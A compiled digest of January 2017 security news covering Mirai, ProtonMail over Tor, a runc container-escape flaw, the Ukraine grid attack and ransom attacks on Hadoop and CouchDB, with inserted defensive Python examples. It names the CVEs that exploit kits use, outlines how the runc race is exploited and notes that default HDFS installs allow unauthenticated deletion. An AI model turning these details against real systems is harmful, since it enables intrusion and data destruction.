A variant of the staffing issue returns in the growing tendency for SOCs to rely on open source tools. As with MSPs, this can provide an immediate increase in security and a reduction in costs -- but once again it usually doesn't last. OSS rarely comes with the support, documentation or metrics that can ensure compliance and security objectives remain sustainable.

Furthermore, OSS solutions frequently require customization and ongoing maintenance. Staff, however, tend not to stay as long as the software. HPE claims that security leadership usually turns over every 18 months -- and key staff can move on even sooner. Staff churn has a negative effect on the OSS maintenance, and this in turn can reduce the effectiveness and maturity of the SOC. This doesn't mean that OSS should be abandoned, but that organizations need to be aware of the ongoing commitment.

Overall SOC maturity remains well below optimal levels. HPE can find no direct correlation between high maturity and enterprise size: while some large enterprises have good maturity, other multinationals remain poor. Here the difference seems to be in management attitude and willingness to spend (which itself is linked to risk perception).

In terms of verticals, service organizations have replaced technology organizations as the more mature. The telecom industry continues to have poor maturity, partly because its primary concern is service availability. HPE expects this to improve over the next few years with the emergence of a new breed of telecommunication company. Government, however, continues to struggle -- and again it is partly the staffing issue. Rigid structures slow down implementations, while rapid staff turnover stops them even being started. As a result, for example, Government metrics tend to be based on staffing rather than maturity and effectiveness.

The whole problem is, of course, exacerbated by the rapidly changing threat landscape. The emergence of destructive malware and ransomware has demanded closer ties between SOCs and disaster recovery and business continuity (DRBC) teams. The new General Data Protection Regulation (GDPR) will also present new issues. Although organizations are aware of the implications, the necessary changes have not yet been implemented. The requirement to detect and inform EU citizens of personal data compromises within 72 hours will drive new SOC detection and response use cases and investment for compliance around the globe.

Given these problems, the 3% overall improvement in SOC maturity over last year is an achievement.

Cyber Threat Intelligence Shows Majority of Cybercrime is NOT Sophisticated

20.1.2017 Securityweek Analysis
It’s a new year and while some things change, some things stay the same (or similar). There’s lots of FUD about the sophisticated cyber attacks that are multi-threaded and obfuscated. Certainly there are attacks that fall into this category, but if you look at all of the cybercrime activity from the past year, it’s clear that the majority of threats do not have the level of sophistication that is often talked about.

Rather, what cyber threat intelligence is showing us is that most threats simply exploit a series of well-documented vulnerabilities and other weak points to move along the path of least resistance – and the most profit. Let’s look at some of the top threats out there today through the prism of the threat triangle, which is the actor’s capability, intent and opportunity:

1. Ransomware - This threat leverages old school, but effective, Social Engineering tactics. Getting someone to click on a malicious macro still works … even though macros are not commonly used anymore (seriously, have you or do you know anyone who has ever used a macro?). It’s human nature to be curious and that curiosity is easily exploitable.

Here are things you can do to reduce an adversary’s opportunity of successfully carrying out a ransomware campaign (and to limit your risk even if a ransomware attack is successful):

Deploy anti-phishing capabilities as this is the most common method used by attackers to kick off a campaign. Anti-malware software configured to scan all email attachments will help catch most malicious attachments. All settings that allow the documents to download and open directly should also be disabled.

Restrict unnecessary users from having administrator-level permissions on their local machines, unless specifically required. Unfortunately, in many cases local admin is given to users to make them stop complaining about an app not working. Limiting this privilege could lessen the impact of ransomware.

To all Microsoft shops - Did you know there is a GPO that can help? Microsoft has adapted group policy settings to assist system administrators in taking more appropriate steps in defending against threats such as ransomware while still keeping accustomed user functionality.

Train your users. Yeah this isn’t a new concept either, but it can be effective if done well. I don’t mean just a written policy that is a long list of “do this, don’t do that.” I once worked for an organization that had over 100+ slides in their cyber security user orientation deck, which is overwhelming to say the least. Your training program should hit on the most important points and not overwhelm users where they will tune out. Understand the top three threats to your users and focus on those top three. Have a conversation with your users. What works here is actually putting your users through real-life scenarios and doing this on a semi-regular basis. It keeps it fresh in their minds and makes them more aware.

Patch your gear - Did you know that most ransomware is served up via exploit kits when your users visit a compromised site, or is delivered via a malicious payload in a phishing email? Did you know that the patches for the CVEs exploited in both scenarios have been out for quite a while? Be aggressive with vulnerability management in your user environment, as user endpoints are the most exposed.

2. Exploit kits - Many of the kits out there leverage CVEs for which there is no good reason not to patch. Look at the RIG, Sundown and Magnitude exploit kits as recent examples. The lists below include the CVEs currently and previously attributed to each kit:

The RIG EK Exploits: CVE-2012-0507, CVE-2013-0074, CVE-2013-2465, CVE-2013-2471, CVE-2013-2551, CVE-2013-3896, CVE-2014-0311, CVE-2014-0322, CVE-2014-0497, CVE-2014-6332, CVE-2015-0313, CVE-2015-2419, CVE-2015-3090, CVE-2015-5119, CVE-2015-5122, CVE-2015-5560, CVE-2015-7645, CVE-2015-8651, CVE-2016-0034, CVE-2016-0189, CVE-2016-1019, CVE-2016-4117, CVE-2016-7200, CVE-2016-7201, CVE-2016-3298

The Sundown EK Exploits: CVE-2012-1876, CVE-2013-7331, CVE-2014-0556, CVE-2014-0569, CVE-2014-6332, CVE-2015-2444, CVE-2015-0311, CVE-2015-0313, CVE-2015-5119, CVE-2015-2419, CVE-2016-0034, CVE-2016-4117, CVE-2016-0189, CVE-2016-7200, CVE-2016-7201

The Magnitude EK Exploits: CVE-2011-3402, CVE-2012-0507, CVE-2013-2551, CVE-2013-2643, CVE-2015-0311, CVE-2015-7645, CVE-2015-3113, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017, CVE-2016-1019, CVE-2016-4117

There is no reason these CVEs should be present in your environment!

3. Credentials management - Password complexity and reuse is again nothing new or sophisticated, yet we continue to see new attacks leveraging compromised credentials from old breaches. A few business process and technical recommendations you can implement to limit this security issue:

· Re-examine your password policies and ensure they are being enforced. Users will always gravitate to the path of least resistance and will tend to leverage the weakest password option being presented. Forcing password resets at certain time periods and implementing two-factor authentication can also help protect systems from password reuse attacks.

· If you have not already done so, you should investigate deploying an easy-to-use password manager for your user base. Also don't make the assumption that this is just limited to business-related credentials. It is commonplace for a user’s personal and business credentials to be co-located both on personal and business devices. If you choose to procure a password manager for your organization, think about extending the licenses to your employees’ personal devices as well.

· Training and education - Customers, employees and other users should be dissuaded from reusing passwords from other accounts. If you suspect data has been compromised, whether directly from your site or from another breach, take proactive measures to prevent password reuse attacks by resetting passwords.

4. Extortion - Similar to ransomware, this threat leverages targets based on an unhealthy level of presence. The difference is that while ransomware encrypts your data and keeps it captive until the bad guy gets paid, an extortionist gains leverage against an organization by compromising its data via exfiltration and then embarrassing the victim into paying up. A recent example of cyber extortion revolves around an actor by the name of TheDarkOverlord, who uses social media to publicly threaten organizations and potentially expose the stolen sensitive data if not paid off.

· Remove the Opportunity - The root issue here is that our adversaries require “us” to present vulnerabilities to them in order for them to succeed. If you remove the opportunity you are directly influencing their capability to extort.

· Cyber Security “Technical Debt” - When an organization presents too much opportunity for an adversary, I am reminded of the term “Technical Debt” which is a metaphor for designing software properly versus taking short cuts to get something done faster and cheaper. To get something developed and quickly out the door, oftentimes those shortcuts taken require you to essentially take out a loan with a high interest rate. Eventually that loan will come due and you will end up paying more in the long run. The key point here is that with today's cybercriminal tactics, taking a technical debt loan opens up a whole list of additional impacts that were not typically a risk in the past. When an organization chooses to take a big technical debt loan out, it is ultimately presenting more opportunities for an adversary to exploit. You are now taking on additional risk that can potentially cause irreparable harm to your organization. These risks, if breached can cause impacts to customers (trust and loyalty), brand and reputation, and regulatory or legal action to name a few.

With cyber threat intelligence that is relevant to your business, supply chain and industry, you can pinpoint key areas of risk to address. What we’ve seen over the past year is a good reminder to focus on the security basics before addressing the more complex. There are a lot of headline-grabbing threats that tend to generate a needless frenzy, which in many cases may not have as direct an impact on your organization anyway.

Which is the real identity of the Mirai Author Anna-Senpai?
20.1.2017 securityaffairs

The popular investigator Brian Krebs published the details of his investigation on the identity of the Mirai author Anna-Senpai.
In recent months the Mirai bot has monopolized the attention of the media; it was used to power the massive DDoS attack against the Dyn DNS service, causing an extended Internet outage.

A large portion of Internet users were unable to reach major web services; many websites, including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify, were down for netizens in the US.

The same IoT botnet was used to launch a massive Distributed Denial of Service (DDoS) attack against the website of the popular cyber security investigator Brian Krebs, who decided to investigate the author of the dangerous malware.

In October a hacker released the source code of the Mirai malware; a reference to the malicious code was spotted by Brian Krebs on the popular criminal hacking forum Hackforums. The Hackforums user with the moniker “Anna-senpai” shared the link to the source code of the malware “Mirai.”

“The leak of the source code was announced Friday on the English-language hacking community Hackforums. The malware, dubbed ‘Mirai’ spreads to vulnerable devices by continuously scanning the Internet for IoT systems protected by factory default or hard-coded usernames and passwords.” reported Krebs.

The Mirai malware was specifically designed to infect Internet of Things (IoT) devices using factory-default credentials, a circumstance that is quite common in the wild.

Brian Krebs believes he has discovered the real identity of the mysterious Anna-senpai: Paras Jha, the owner of the distributed denial-of-service (DDoS) attack mitigation company ProTraf Solutions.

“After months of gathering information about the apparent authors of Mirai, I heard from Ammar Zuberi, once a co-worker of ProTraf President Paras Jha.

Zuberi told KrebsOnSecurity that Jha admitted he was responsible for both Mirai and the Rutgers DDoS attacks. Zuberi said when he visited Jha at his Rutgers University dorm in October 2015, Paras bragged to him about launching the DDoS attacks against Rutgers.” wrote Krebs.

“He was laughing and bragging about how he was going to get a security guy at the school fired, and how they raised school fees because of him,” Zuberi recalled. “He didn’t really say why he did it, but I think he was just sort of experimenting with how far he could go with these attacks.”

The man allegedly created the Mirai botnet and spread it to recruit the largest possible number of IoT devices.

Krebs reported that in 2014, an earlier variant of the Mirai botnet was used to launch DDoS attacks against Minecraft servers which can generate up to US$50,000 a month.

Krebs discovered that Jha along with other players developed the Mirai bot and used it to power an attack against the Minecraft servers to lure disgruntled customers. The providers that ignored Jha’s requests were hit by massive DDoS attacks.

Krebs explained that Jha contacted upstream providers to request the shutdown of rival IoT firms, then he developed the Mirai bot to attack rival Qbot botnets.

Krebs cited a webinar presented on December 16 by experts at the firm Digital Shadows that exposed the findings of the investigation into the Mirai author’s real-life identity. According to Digital Shadows, the person behind the Anna-Senpai moniker also used the nickname “Ogmemes123123” and the email address ogmemes123123@gmail.com. Krebs also discovered that the Mirai author has used another nickname, “OG_Richard_Stallman,” a clear reference to the founder of the Free Software Foundation. The ogmemes123123@gmail.com account was also used to register a Facebook account in the name of OG_Richard Stallman.

That Facebook account reports that OG_Richard_Stallman began studying computer engineering at New Brunswick, NJ-based Rutgers University in 2015, the same university attended by Paras Jha. Rutgers University has suffered a series of DDoS attacks on its systems since 2015; the attacker suggested that the school purchase a DDoS mitigation service.

Krebs also highlighted that the skills listed on Jha’s LinkedIn page are the same as those on the Mirai author Anna-senpai’s HackForums profile.

Krebs’s analysis is very intriguing and full of details … enjoy it!

ProtonMail announced that its Tor Hidden Service is online
20.1.2017 securityaffairs Security

The popular encrypted email provider ProtonMail has launched the Tor Hidden Service to provide further protection to its users.
ProtonMail is the world’s largest encrypted email provider, with over 2 million users worldwide. Its popularity exploded just after the US presidential election; its users include journalists, activists, businesses, and ordinary people who want to protect their security and privacy. The service is free and open source, features strong end-to-end encryption and is protected by Swiss privacy laws.

Implementing a Tor hidden service for ProtonMail has numerous advantages for end users: communications are protected by supplementary layers of encryption, the user’s IP address is masked by the anonymizing network, and such a service is able to bypass government censorship.

“There are several reasons why you might want to use ProtonMail over Tor. First, routing your traffic to ProtonMail through the Tor network makes it difficult for an adversary wiretapping your internet connection to know that you are using ProtonMail. Tor applies extra encryption layers on top of your connection, making it more difficult for an advanced attacker to perform a man-in-the-middle attack on your connection to us. Tor also makes your connections to ProtonMail anonymous as we will not be able to see the true IP address of your connection to ProtonMail,” ProtonMail explained in a blog post.

“Tor can also help with ProtonMail accessibility. If ProtonMail becomes blocked in your country, it may be possible to reach ProtonMail by going to our onion site. Furthermore, onion sites are “hidden” services in the sense that an adversary cannot easily determine their physical location. Thus, while protonmail.com could be attacked by DDoS attacks, protonirockerxow.onion cannot be attacked in the same way because an attacker will not be able to find a public IP address.”

The onion address for the ProtonMail Tor service:

protonirockerxow.onion

Just out of curiosity: the above address was generated by the company, which used spare CPU capacity to generate millions of encryption keys and hashed them, aiming for a more human-readable address. The address can be easily remembered as:

proton i rocker xow
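The search described above works because a version-2 onion address is not chosen but derived: it is the first 80 bits of the SHA-1 hash of the service's DER-encoded RSA-1024 public key, written as 16 base32 characters. Getting a readable prefix therefore means generating keys until the hash happens to start with it, and every additional character multiplies the expected work by 32. The following is an added example written for this page, not ProtonMail's tooling; the "keys" it feeds to the search are random byte strings standing in for real RSA keys (an assumption that keeps the demo offline and fast), and the derivation function is the real one.

```python
"""Version-2 onion address derivation and the cost of a vanity prefix.

Added example, not ProtonMail's code.  A v2 onion address is the first 80
bits of SHA-1 over the DER-encoded RSA-1024 public key, base32-encoded (16
characters).  A vanity prefix is found by generating keys until the hash
starts with it; each extra base32 character multiplies the expected work by
32.  The "keys" below are random byte strings standing in for real DER
encoded RSA keys so the search runs offline and quickly.
"""
import base64
import hashlib
import os
from typing import Callable, Tuple

BASE32_ALPHABET = "abcdefghijklmnopqrstuvwxyz234567"


def onion_address_v2(der_public_key: bytes) -> str:
    """Derive a v2 .onion hostname (without the suffix) from a DER-encoded public key."""
    digest = hashlib.sha1(der_public_key).digest()[:10]          # first 80 bits of SHA-1
    return base64.b32encode(digest).decode("ascii").lower()      # 16 base32 characters


def expected_trials(prefix: str) -> int:
    """Expected number of keys to try before one address starts with `prefix`."""
    if any(c not in BASE32_ALPHABET for c in prefix):
        raise ValueError("prefix must use base32 characters a-z and 2-7")
    return 32 ** len(prefix)


def search_vanity(prefix: str, keygen: Callable[[], bytes],
                  max_trials: int = 1_000_000) -> Tuple[bytes, str, int]:
    """Generate keys until the derived address starts with `prefix`.

    Returns (key, address, number_of_trials); raises if the budget runs out.
    """
    for trial in range(1, max_trials + 1):
        key = keygen()
        address = onion_address_v2(key)
        if address.startswith(prefix):
            return key, address, trial
    raise RuntimeError(f"no address starting with {prefix!r} within {max_trials} trials")


def stand_in_keygen() -> bytes:
    """Constructed stand-in: a real search would produce a fresh RSA-1024 key here."""
    return os.urandom(140)   # same length as a DER PKCS#1 RSAPublicKey with a 1024-bit modulus


if __name__ == "__main__":
    print("expected keys for the prefix 'proton':", expected_trials("proton"))
    key, address, trials = search_vanity("pr", stand_in_keygen)
    print(f"found {address}.onion after {trials} keys (expected about {expected_trials('pr')})")
```

With the page's own address, `expected_trials("proton")` is 32**6, roughly a billion keys; the remaining ten characters are whatever the hash produced, which is why the rest reads "irockerxow" rather than a chosen word.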


ProtonMail published detailed instructions on how to set up Tor and how to access the service over Tor. For example, using the ProtonMail hidden service requires JavaScript to be enabled:

“Tor Browser disables Javascript by default, but you will need it for our onion site. You can do this by clicking the “NoScript” button and selecting “Temporarily allow all this page”” reads the ProtonMail page.

The ProtonMail hidden service only accepts HTTPS connections; it uses a digital certificate issued by DigiCert, the same CA used by Facebook for its Tor hidden service.

The ProtonMail hidden service could be reached via a desktop web browser and both iOS and Android apps.

Docker Patches Escape Container Vulnerability

20.1.2017 Securityweek Vulnerability
Docker recently resolved a runc privilege escalation vulnerability that could be exploited by a malicious program to escape the container and access the host.

Tracked as CVE-2016-9962, the security issue is created because runc passes a file descriptor from the host's filesystem to the "runc init" bootstrap process when joining a container. This means that a malicious process inside the container can gain access to the host filesystem with its current privilege set.

Discovered by Alexander Bergmann, the vulnerability is rather difficult to exploit, because the race window between joining the container and the execve call is quite small. According to Docker's CVE database, the privilege escalation issue is the result of a file descriptor being opened insecurely. Docker 1.12.6 resolves the bug.

Because the issue resides in the runc code, other container platforms built on runc might also be affected, Aqua Security's Sagie Dulce says. The vulnerability is triggered when exec-ing an application in an already running container, the researcher explains.

The use of an inherited file descriptor inside the container allows a malicious process to access the file descriptor of a directory that resides on the host and then the rest of the host's filesystem. Because the bug can be leveraged for directory traversal to the host's file system, it results in an effective container escape, Dulce notes.

Exec-ing commands inside a running container is actually a bigger issue, of which the open file descriptor is only one part. The window of opportunity during which the container has access to the runc init process on the host is very small: it closes once the runc init process execs the command inside the container.

“This is because runc enters the namespace of the container before it execs the final command. This window could enable a container, for example, to list file descriptors on the host process, which can then lead it to the host’s file system. Because many containers run as root, this indeed has serious implications,” the researcher notes.

The issue can be exploited in containers that lack the CAP_SYS_PTRACE capability, although it is much easier to access the file descriptors if the capability exists. A correctly timed exploit can leverage the vulnerability without having control of the runc init process. “One can escape a container […] by simply patching runc to sleep before calling exec,” Dulce says.

According to Red Hat’s Dan Walsh, SELinux mitigates the vulnerability. “SELinux is the only thing that protects the host file system from attacks from inside of the container. If the processes inside of the container get access to a host file and attempt to read and write the content SELinux will check the access,” he explains.

The released patch ensures that no host file descriptors are present in the runc init process. Moreover, the fix marks the runc init process non-dumpable before it calls setns to enter the container's namespaces, which protects it from being inspected by processes inside the container.
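The two properties the fix enforces, checked in code, as an added example (not runc's or Docker's own code): a helper that is about to join a container's namespaces must carry no host directory descriptors, and must be non-dumpable so that container processes cannot read its /proc entries. It is Linux-only and reads /proc directly; the prctl option numbers are from linux/prctl.h, and the function names are this example's own.

```python
import ctypes
import ctypes.util
import os
import stat

PR_GET_DUMPABLE = 3  # linux/prctl.h
PR_SET_DUMPABLE = 4

_libc = ctypes.CDLL(ctypes.util.find_library("c"), use_errno=True)
_libc.prctl.restype = ctypes.c_int


def open_fds(pid="self"):
    """Map every open descriptor of `pid` to the path /proc reports for it."""
    base = "/proc/%s/fd" % pid
    fds = {}
    for name in os.listdir(base):
        try:
            fds[int(name)] = os.readlink(os.path.join(base, name))
        except OSError:
            continue  # closed between listdir() and readlink()
    return fds


def leaked_directory_fds(keep=(0, 1, 2)):
    """Descriptors, other than `keep`, that refer to directories.

    A directory descriptor is the dangerous kind in CVE-2016-9962: openat()
    relative to it reaches the rest of the filesystem it belongs to.
    """
    leaked = []
    for fd in open_fds():
        if fd in keep:
            continue
        try:
            if stat.S_ISDIR(os.fstat(fd).st_mode):
                leaked.append(fd)
        except OSError:
            continue  # already closed
    return sorted(leaked)


def open_directory(path):
    """Open a directory descriptor (used to demonstrate the leak check)."""
    return os.open(path, os.O_RDONLY | os.O_DIRECTORY)


def close_fds(fds):
    """Close the given descriptors; returns those actually closed."""
    closed = []
    for fd in list(fds):
        try:
            os.close(fd)
            closed.append(fd)
        except OSError:
            pass
    return closed


def set_dumpable(value):
    """prctl(PR_SET_DUMPABLE, value). 0 makes the process non-dumpable: other
    processes lose ptrace access and /proc/<pid>/* becomes root-owned."""
    if _libc.prctl(PR_SET_DUMPABLE, value, 0, 0, 0) != 0:
        err = ctypes.get_errno()
        raise OSError(err, os.strerror(err))


def is_dumpable():
    return _libc.prctl(PR_GET_DUMPABLE, 0, 0, 0, 0) == 1


def harden_before_setns(keep=(0, 1, 2)):
    """What a hardened init helper does right before setns(): close every
    descriptor except `keep`, verify no directory descriptor survived, then
    drop dumpability. Returns the descriptors that were closed.

    Only call this in a dedicated helper process: closing descriptors
    indiscriminately in an ordinary program breaks it."""
    closed = close_fds(fd for fd in open_fds() if fd not in keep)
    if leaked_directory_fds(keep):
        raise RuntimeError("host directory descriptor survived cleanup")
    set_dumpable(0)
    return closed


if __name__ == "__main__":
    fd = open_directory("/")
    print("directory fds before cleanup:", leaked_directory_fds())
    close_fds([fd])
    print("directory fds after cleanup:", leaked_directory_fds())
```

The same two checks work as a detection: listing /proc/PID/fd of a helper that has already entered the container (from the host side) should show nothing pointing at a host directory, and its /proc/PID entries should be root-owned.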

Ukraine Power Company Confirms Hackers Caused Outage

20.1.2017 Securityweek Hacking
The investigation is ongoing, but Ukraine’s national power company Ukrenergo has confirmed that the recent electricity outage in the Kiev region was caused by a cyberattack.

In a statement emailed to SecurityWeek on Thursday, Ukrenergo said a preliminary analysis showed that the normal operation of workstations and SCADA servers had been disrupted due to “external influences.”

The analysis indicates that the incident, described as a planned and layered intrusion, involved malware that allowed the attackers to remotely control internal systems. Investigators are in the process of establishing a timeline of events and identifying compromised accounts, points of entry, and devices infected with malware that may be lying dormant.

Ukrenergo is confident that the results of this investigation will help the company implement organizational and technological measures that would help prevent cyber threats and reduce the risk of power failure.

The incident took place on the night between December 17 and 18 at the substation in Pivnichna, causing blackouts in the capital city of Kiev and the Kiev region. Power was fully restored after just over an hour.

Ukrenergo officials immediately suspected external interference and brought in cybersecurity experts to conduct an investigation.

One of the experts involved in the probe told the BBC that the 2016 attacks were more sophisticated and better organized compared to the ones launched in December 2015. It also appears that several threat groups had worked together, and they may have tested techniques that could be used in other campaigns as well.

Russia is again the main suspect, the country being blamed for many of the cyberattacks launched recently against Ukraine.

A report published in October by Booz Allen Hamilton showed that the December 2015 attacks on Ukraine’s electric grid were part of a long-running campaign that also targeted the railway, media, mining and government sectors.

In the meantime, researchers continue to monitor KillDisk, one of the pieces of malware involved in the 2015 attack. They recently discovered that the destructive malware had turned into ransomware and started infecting Linux machines as well.

DHS Publishes National Cyber Incident Response Plan

20.1.2017 Securityweek Security
The U.S. Department of Homeland Security has published the National Cyber Incident Response Plan (NCIRP), which aims to describe the government’s approach in dealing with cyber incidents involving public or private sector entities.

The DHS started working on the NCIRP shortly after President Barack Obama released the Presidential Policy Directive on Cyber Incident Coordination (PPD-41) in July last year. After making available a draft in September, the DHS has now announced the release of the final version.

The NCIRP has three main goals: define the responsibilities and roles of government agencies, the private sector and international stakeholders; identify the capabilities required to respond to a significant incident; and describe how the government will coordinate its activities with the affected entity.

“The National Cyber Incident Response Plan is not a tactical or operational plan for responding to cyber incidents,” explained Homeland Security Secretary Jeh Johnson. “However, it serves as the primary strategic framework for stakeholders when developing agency, sector, and organization-specific operational and coordination plans. This common doctrine will foster unity of effort for emergency operations planning and will help those affected by cyber incidents understand how Federal departments and agencies and other national-level partners provide resources to support mitigation and recovery efforts.”

The NCIRP focuses on four main lines of effort: threat response, asset response, intelligence support, and affected entity response.

The lead federal agency for threat response is the Department of Justice through the FBI and the National Cyber Investigative Joint Task Force (NCIJTF). Threat response includes mitigating the immediate threat, investigative activity at the affected organization’s site, collecting evidence and intelligence, attribution, finding links between incidents and identifying other affected entities, and finding opportunities for threat pursuit and disruption.

Asset response is handled by the DHS through the National Cybersecurity and Communications Integration Center (NCCIC). Activities in this line of effort include providing technical assistance to help affected entities protect their assets, reducing the impact of the incident, mitigating vulnerabilities, identifying other entities that may be at risk, and assessing potential risks to the affected sector or region.

Threat and asset response teams have some shared responsibilities, including the facilitation of information sharing and operational coordination, and providing guidance on the use of federal resources and capabilities.

The lead agency for intelligence support is the Office of the Director of National Intelligence (ODNI) through the Cyber Threat Intelligence Integration Center (CTIIC). The agency is tasked with providing support to asset and threat response teams, analyzing trends and events, identifying knowledge gaps, and mitigating the adversary’s capabilities.

If a significant cyber incident involves a federal agency, that agency is responsible for managing the impact of the incident. This can include maintaining business or operational continuity, protecting privacy, addressing adverse financial impact, breach disclosure and notification, and handling media and congressional inquiries.

If the incident affects a private entity, the role of the government is to be aware of that entity’s response activities and assess the potential impact on private sector critical infrastructure.

Ransack Campaigns Target Hadoop and CouchDB

20.1.2017 Securityweek Virus
Following a series of ransom attacks against MongoDB and Elasticsearch databases in recent weeks, many users of CouchDB and Hadoop are now finding their databases are under attack as well.

With the help of automated tools, attackers have been targeting Internet-accessible databases that haven't been properly secured and either erasing or stealing data, then dropping a note demanding a specific ransom amount in exchange for the stolen data.

Insecure MongoDB installations were targeted first, and over 33,000 databases have already fallen victim to the attacks. However, as more hackers joined the rush, attackers started looking into alternatives, and Elasticsearch databases came into the crosshairs next.

Only several hundred such installations were targeted within the first couple of days, but the number has since grown to over 4,600 as of today, according to the public spreadsheet that security researchers Victor Gevers and Niall Merrigan (who have been tracking these attacks since the beginning) use to follow the campaign.

The attacks on MongoDB installations have reportedly slowed down, suggesting that hackers are focusing on Elasticsearch databases (over 30,000 of them are reportedly exposed) or other targets. With one actor actively attempting to sell the ransomware kit for MongoDB and Elasticsearch, it remains to be seen whether more attackers will start targeting these databases as well.

For now, however, it's certain that Internet-facing CouchDB and Hadoop Distributed File System (HDFS) installations are potential victims of these attacks. The key change is that the hackers might no longer steal the data to hold it for ransom, but simply erase everything in an attempt to do harm.

While the number of CouchDB databases that have fallen to the ransom attack is still low, there are around 4,000 exposed instances, and their fate could turn for the worse if admins don’t secure them in a timely manner.

The public spreadsheet tracking attacks on Hadoop servers shows that 126 of them have already been vandalized and that three attackers are actively pursuing them at the moment. There are between 8,000 and 10,000 HDFS installations out there, which gives attackers quite a large attack surface.

Fidelis Cybersecurity Threat Research says that the attacks on HDFS installations (which started ramping up last week) are possible because admins use minimal security and have made installations accessible from the Internet, and because denial of service (DoS) attacks have been trending up over the past years, especially in the enterprise segment.

Because HDFS installations using default configurations allow access without authentication, any attacker with basic proficiency in Hadoop can start deleting files. “On or around January 5 to January 6, traffic to port 50070 soared as attackers scanned for open HDFS installations to target,” Fidelis says.

To stay protected, admins need to follow some simple rules that apply to all of these databases, be they MongoDB, Elasticsearch, CouchDB, or HDFS: avoid exposing them to the Internet unless absolutely necessary, and use strong authentication settings (leaving the default settings could mean that no authentication is required at all). Regularly backing up data helps restoration efforts after being hit.
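What "default settings mean no authentication" looks like for HDFS specifically, and how an admin can check for it, as an added example (not Hadoop's own tooling and not from the Fidelis report): the script merges core-site.xml and hdfs-site.xml over the Hadoop 2.x defaults and flags the conditions the campaign relied on. The property names are real Hadoop settings; the XML samples and the host name namenode.internal are constructed.

```python
import xml.etree.ElementTree as ET

# Values Hadoop 2.x uses when a property is absent from the site files.
HADOOP_DEFAULTS = {
    "hadoop.security.authentication": "simple",  # client asserts its own user
    "hadoop.security.authorization": "false",
    "dfs.permissions.enabled": "true",
    "dfs.namenode.http-address": "0.0.0.0:50070",  # web UI / WebHDFS
}


def parse_site_xml(text):
    """Return {name: value} for every <property> in a *-site.xml document."""
    props = {}
    for prop in ET.fromstring(text).iter("property"):
        name = prop.findtext("name")
        if name:
            props[name.strip()] = (prop.findtext("value") or "").strip()
    return props


def effective_config(*site_xml_texts):
    """Merge site files over the defaults (later files win, as in Hadoop)."""
    merged = dict(HADOOP_DEFAULTS)
    for text in site_xml_texts:
        merged.update(parse_site_xml(text))
    return merged


def audit(config):
    """Return (finding_id, message) pairs, one per weak setting."""
    findings = []
    auth = config["hadoop.security.authentication"].lower()
    if auth != "kerberos":
        findings.append(("authentication",
                         "hadoop.security.authentication=%s: clients choose their own "
                         "user name, so anyone who can reach the service can act as "
                         "the superuser" % auth))
    if config["hadoop.security.authorization"].lower() != "true":
        findings.append(("authorization",
                         "hadoop.security.authorization=false: service-level ACLs "
                         "are not enforced"))
    if config["dfs.permissions.enabled"].lower() != "true":
        findings.append(("permissions",
                         "dfs.permissions.enabled=false: HDFS ignores file ownership "
                         "and modes"))
    host, _, port = config["dfs.namenode.http-address"].rpartition(":")
    if host.strip("[]") in ("", "0.0.0.0", "::"):
        findings.append(("bind-address",
                         "NameNode web UI/WebHDFS listens on all interfaces, "
                         "port %s" % port))
    return findings


def audit_files(*site_xml_texts):
    return audit(effective_config(*site_xml_texts))


# Constructed sample: an out-of-the-box install that keeps the defaults and
# additionally switches permission checks off.
WEAK_CORE_SITE = """<?xml version="1.0"?>
<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://namenode:8020</value></property>
</configuration>"""
WEAK_HDFS_SITE = """<?xml version="1.0"?>
<configuration>
  <property><name>dfs.permissions.enabled</name><value>false</value></property>
</configuration>"""

# Constructed sample of the corrected settings.
HARDENED_CORE_SITE = """<?xml version="1.0"?>
<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://namenode:8020</value></property>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
  <property><name>hadoop.security.authorization</name><value>true</value></property>
</configuration>"""
HARDENED_HDFS_SITE = """<?xml version="1.0"?>
<configuration>
  <property><name>dfs.permissions.enabled</name><value>true</value></property>
  <property><name>dfs.namenode.http-address</name><value>namenode.internal:50070</value></property>
</configuration>"""

if __name__ == "__main__":
    for _, msg in audit_files(WEAK_CORE_SITE, WEAK_HDFS_SITE):
        print("WEAK:", msg)
    print("hardened findings:", audit_files(HARDENED_CORE_SITE, HARDENED_HDFS_SITE))
```

Binding the NameNode HTTP address to an internal interface is not a substitute for a firewall, but an install that passes all four checks is no longer the target the port 50070 scans described above were looking for.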

With tens of thousands of databases already hit worldwide, it's clear that admins need to take a stand and improve their security. Gevers and Merrigan have already taken steps to prevent attacks, such as contacting local GovCERT teams to warn server owners that they are exposed. This reportedly resulted in critical Hadoop servers being pulled off the Internet.

The two security researchers have been hard at work over the past couple of weeks helping victims, and others have already joined their efforts, including Bob Diachenko, Matt Bromiley, and Dylan Katz.

Suspected Russian Hacker Wanted by U.S. Jailed in Spain

20.1.2017 Securityweek Hacking
An alleged Russian hacker wanted for fraud has been detained in Spain and jailed pending extradition to the United States, police and a court spokesman said Thursday.

Stanislav Lisov, a computer programmer, was wanted by US authorities, a spokesman for the Guardia Civil police force said.

"He is accused of conspiracy to commit fraud via electronic media and conspiracy to commit fraud and abuse with computers," a spokesman for Spain's top-level National Court added.

Lisov was detained last week in Barcelona's El Prat airport when he was about to board a flight, police said.

He was jailed on January 13 after being questioned via videoconference by a judge in Madrid's National Court, which investigates suspected crimes that have an international remit.

The judge decided to put him in prison as he does not live in Spain and could escape, and due to the "gravity of the offences."

"Now begins the process of extradition to the United States," the National Court spokesman said, without giving further details.

Satan, the ransomware-as-a-service surfaced in the dark web
20.1.2017 securityaffairs

The independent malware researcher @Xylit0l discovered the Satan ransomware, a malware belonging to the Gen:Trojan.Heur2.FU family.
Yesterday the independent malware researcher @Xylit0l discovered the Satan ransomware, a malware belonging to the Gen:Trojan.Heur2.FU family. Satan is provided as a RaaS (Ransomware-as-a-Service).

Xylitol (@Xylit0l), 5:34 PM - 18 Jan 2017: "New #RaaS https://www.virustotal.com/en/file/c04836696d715c544382713eebf468aeff73c15616e1cd8248ca8c4c7e931505/analysis/1484756083/ …"
The Satan ransomware uses RSA-2048 and AES-256 cryptography and appends the ".stn" extension to the names of encrypted files.


“As mentioned above, Satan’s developers provide a service allowing prospective cyber criminals to make money by distributing this ransomware. In exchange, developers receive 30% of revenues generated by users,” reads the analysis published on pcrisk.com.

